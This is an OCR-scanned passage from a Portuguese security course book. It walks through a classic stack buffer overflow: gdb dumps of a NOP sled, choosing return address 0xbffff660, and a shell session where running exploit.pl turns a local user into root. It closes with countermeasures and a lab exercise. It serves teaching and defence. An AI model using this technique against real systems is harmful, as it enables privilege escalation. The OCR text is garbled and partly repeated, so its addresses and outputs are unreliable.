0x90909090 0x90909090 0x90909090 0x90909090 

0x90909090 0x90909090 0x90909090 

0x90909090 0x90909090 0x90909090 0x90909090 
0x90909090 0x90909090 0x90909090 0x90909090 
0x90909090 0x90909090 0x90909090 0x90909090 
0x90909090 0x90909090 0x90909090 0x90909090 
0x90909090 0x90909090 0x90909090 0x90909090 
0x90909090 0x90909090 0x90909090 0x90909090 
0x90909090 0x90909090 0x90909090 0x90909090 
0x90909090 0x90909090 0x90909090 0x90909090 
0x90909090 0x90909090 0x90909090 0x90909090 
0x90909090 0x90909090 0x90909090 0x90909090 
0x90909090 0x90909090 0x90909090 0x90909090 
0x90909090 0x90909090 0x90909090 0x90909090 
0x90909090 0x90909090 0x90909090 0x90909090 


--- Type «return» to continue, or q «return» to quit--- 


(gdb) 
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Como percebemos, encontramos diversos NOPs na memoria. Entáo, podemos usar 


como endereço de retorno qualquer endereço que contenha somente 0x90 e os 


NOPs nos levarao ate o shellcode. 


| Procurando NOP 


(gdb) x/200x $esp 


oxbffff3fo: 
охь доо: 
oxbffff410: 


oxbffff620: 
oxbffff630: 
oxbffff640: 
oxbffff650: 


0X00000000 
0x08048570 


OXOO0O000000 


0х90909090 
0х90909090 
0х90909090 


0х90909090 


oxbffff454 
oxoooooooo 


oxbffff460 


0х90909090 
0х90909090 
0х90909090 


0х90909090 


oxbffff46o 
oxbffff428 


ox4015abco 


0x90909090 
0х90909090 
0х90909090 


0х90909090 


охо8о4831е 
0X4003e26a 


0х40014428 


0х90909090 
0х90909090 
0х90909090 


0х90909090 





Agora, basta substituir no nosso exploit о valor da variável ret. Aqui irei usar о valor 


Oxbffff660. Feito isso, execute o exploit e veja o que acontece. 


[root@localhost buffer] exit 

exit 

[stack@localhost buffer]# id 

uid-501 (stack) gid=501 (stack) grupos=50 1 (stack),43(usb) 
[stack@localhost buffer] perl —x exploit. pl 

Adaress: Oxbffff660 

Esse é o programa com falha!!! 

A string digitada tem 1040 caracteres. 


sh-2.05% id 


uid-O(root) gid=501 (stack) groups=50 1 (stack), 43(usb) 


sh-2.05# 
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| Explorando 


Agora, basta substituir no nosso exploit o valor da variável ret. Aquiirei usar o valor 
oxbffff660. Feito isso, execute o exploit e veja o que acontece. 


[root@localhost buffer]# exit 

exit 

[stack@localhost buffer] id 

uid-501 (stack) gid=501 (stack) grupos=501(stack),43(usb) 
[stack@localhost buffer]# perl —x exploit.pl 

Address: Oxbffff660 

Esse é o programa com falha!!! 

A string digitada tem 1040 caracteres. 

sh-2.05# id 

uid=0(root) gid=501 (stack) groups=501(stack),43(usb) 


sh-2.05# 





Com isso, conseguimos demonstrar o perigo que é uma falha de programacáo em 
um programa. É possível obter controle completamente sobre o programa que esta 
sendo explorado. Se o programa oferecer algum servico remotamente, a falha pode 
ser explorada remotamente, da mesma forma que foi explorada localmente, apenas 
trocando o shellcode e criando os sockets que seráo responsáveis para se conectar 


no programa. 
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| Conclusão 


= Com isso, conseguimos demonstrar o perigo que 
é uma falha de programação em um programa. É 
possivel obter controle completamente sobre o 
programa que esta sendo explorado. Se o 


programa oferecer algum serviço remotamente, 
a falha pode ser explorada remotamente, da 
mesma forma que foi explorada localmente, 
apenas trocando o shellcode e criando os sockets 
que serão responsaveis para se conectar no 
programa. 





16.6 Contramedidas do Capítulo 


e Nunca confiar nos dados que são enviados pelo usuário 


e Realizar checagem de tamanho dos dados antes de copiá-los para um buffer 


16.7 Laboratório 


1. Utilizando a instalação do Debian Linux nos computadores, vamos criar um 


exploit local que explora um Stack Overflow clássico. 
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